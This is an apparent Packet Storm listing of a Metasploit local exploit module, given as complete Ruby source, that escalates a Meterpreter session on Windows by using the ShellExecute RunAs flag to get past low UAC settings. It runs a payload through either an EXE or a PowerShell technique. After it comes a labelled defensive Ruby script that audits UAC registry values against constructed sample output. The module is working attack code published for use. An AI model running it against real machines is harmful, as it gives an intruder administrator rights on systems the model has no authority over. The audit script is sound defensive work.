
Windows Escalate UAC Execute RunAs

This Metasploit module will attempt to elevate execution level using the ShellExecute undocumented RunAs flag to bypass low UAC settings.

Packet Storm
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Post::Windows::Priv
  include Post::Windows::Runas

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Windows Escalate UAC Execute RunAs',
      'Description'   => %q(
        This module will attempt to elevate execution level using
        the ShellExecute undocumented RunAs flag to bypass low
        UAC settings.
      ),
      'License'       => MSF_LICENSE,
      'Author'        => [
        'mubix', # Original technique
        'b00stfr3ak' # Added powershell option
      ],
      'Platform'      => ['win'],
      'SessionTypes'  => ['meterpreter'],
      'Targets'       => [['Windows', {}]],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2012-01-03'
    ))

    register_options([
      OptString.new('FILENAME', [false, 'File name on disk']),
      OptString.new('PATH', [false, 'Location on disk, %TEMP% used if not set']),
      OptEnum.new('TECHNIQUE', [true, 'Technique to use', 'EXE', %w(PSH EXE)]),
    ])
  end

  def exploit
    if is_uac_enabled?
      print_status 'UAC is Enabled, checking level...'
      case get_uac_level
      when UAC_NO_PROMPT
        print_good 'UAC is not enabled, no prompt for the user'
      else
        print_status "The user will be prompted, wait for them to click 'Ok'"
      end
    else
      print_good 'UAC is not enabled, no prompt for the user'
    end

    case datastore['TECHNIQUE']
    when 'EXE'
      shell_execute_exe(datastore['FILENAME'], datastore['PATH'])
    when 'PSH'
      shell_execute_psh
    end
  end
end
```
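The module branches on whether UAC is enabled and on the UAC level (`is_uac_enabled?`, `get_uac_level`, `UAC_NO_PROMPT`). The Ruby script below is an added example, not part of the module or of Metasploit: it audits the same settings from the defender's side by parsing `reg query` output. It assumes those helpers correspond to the `EnableLUA` and `ConsentPromptBehaviorAdmin` values under the `Policies\System` key; the function names and the sample output are constructed for illustration.

```ruby
# Added example: audit the UAC policy values that decide whether an
# elevation request prompts the user. Not part of the Metasploit module.
# ConsentPromptBehaviorAdmin values, as documented by Microsoft.
ADMIN_PROMPT = {
  0 => 'elevate without prompting',
  1 => 'prompt for credentials on the secure desktop',
  2 => 'prompt for consent on the secure desktop',
  3 => 'prompt for credentials',
  4 => 'prompt for consent',
  5 => 'prompt for consent for non-Windows binaries'
}.freeze

# Parse the REG_DWORD rows of `reg query` output into { 'Name' => integer }.
def parse_reg_dwords(text)
  text.scan(/^[ \t]+(\S+)[ \t]+REG_DWORD[ \t]+(0x\h+)\r?$/)
      .to_h { |name, hex| [name, hex.hex] }
end

# Return findings for one host; an empty array means nothing was flagged.
def audit_uac(values)
  # Absent values fall back to the Windows defaults (assumption of this example).
  lua     = values.fetch('EnableLUA', 1)
  consent = values.fetch('ConsentPromptBehaviorAdmin', 5)
  desktop = values.fetch('PromptOnSecureDesktop', 1)

  return ['CRITICAL: EnableLUA=0, UAC is disabled'] if lua.zero?

  findings = []
  if consent.zero?
    findings << 'CRITICAL: ConsentPromptBehaviorAdmin=0, admins elevate without a prompt'
  elsif !ADMIN_PROMPT.key?(consent)
    findings << "WARN: unknown ConsentPromptBehaviorAdmin=#{consent}"
  end
  if desktop.zero? && consent >= 3
    findings << 'WARN: PromptOnSecureDesktop=0, prompt appears on the interactive desktop'
  end
  findings
end

# Constructed sample of the output of:
#   reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
SAMPLE = <<~'REG'
  HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
      ConsentPromptBehaviorAdmin    REG_DWORD    0x0
      EnableLUA    REG_DWORD    0x1
      PromptOnSecureDesktop    REG_DWORD    0x0
REG

puts audit_uac(parse_reg_dwords(SAMPLE)) if __FILE__ == $PROGRAM_NAME
```

Either CRITICAL finding corresponds to a branch where the module reports that the user will not be prompted.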
